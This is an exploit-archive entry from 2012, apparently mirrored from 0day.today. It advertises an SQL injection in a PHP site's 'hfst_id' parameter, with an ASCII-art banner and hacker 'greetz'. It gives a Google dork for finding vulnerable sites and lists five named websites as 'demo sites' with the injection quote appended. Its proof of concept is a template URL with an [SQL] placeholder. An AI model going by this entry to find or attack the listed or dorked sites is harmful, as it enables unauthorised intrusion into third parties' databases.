id: 18108
date: 04/21/2012
title: Nederlanden's Server Website (.nl) - SQL injection
author: Mataty501
cves: 

 __  __       _        _         _____  ___  __ 
|  \/  |     | |      | |       | ____|/ _ \/_ |
| \  / | __ _| |_ __ _| |_ _   _| |__ | | | || |
| |\/| |/ _` | __/ _` | __| | | |___ \| | | || |
| |  | | (_| | || (_| | |_| |_| |___) | |_| || |
|_|  |_|\__,_|\__\__,_|\__|\__, |____/ \___/ |_|
                            __/ |               
                           |___/ On 1337day.com
|------------------------------------------  Vulnerability info  ------------------------------------------
| *Exploit Title: [Nederlanden's Server Website (.nl) - SQL injection ]       
| *Author: Mataty501    
| *Email:  Mataty501@gmail.com    
| *Category: Webapps    
| *Google dork: inurl:/index.php?hfst_id=    
| *Tested on: Windows/Linux                                                                               
| *Demo site:    
| http://www.ascomsep.com/index.php?hfst_id=4'    
| http://www.twistontwerp.nl/index.php?hfst_id=2'    
| http://www.bdbsearch.nl/index.php?hfst_id=20'    
| http://www.wereldbanen.org/index.php?hfst_id=2'      
| http://www.zomozorg.nl/index.php?hfst_id=2'      
|------------------------------------------ Vulnerability Details -----------------------------------------
|    
| *Exploit/p0c:    
|    
| http://www/.[site].nl/index.php?hfst_id=[SQL]    
|    
|    
|----------------------------------------------------------------------------------------------------------
|    
| *Greetz to :[ The Lamer who stealed this exploit , Retno , 2Math Classe's , Lycée El Afia ( El Bac 2013 Inchalah ) , And All Algerian Hackers... ]
|    
|----------------------------------------------------------------------------------------------------------



#  0day.today [2023-03-26]  #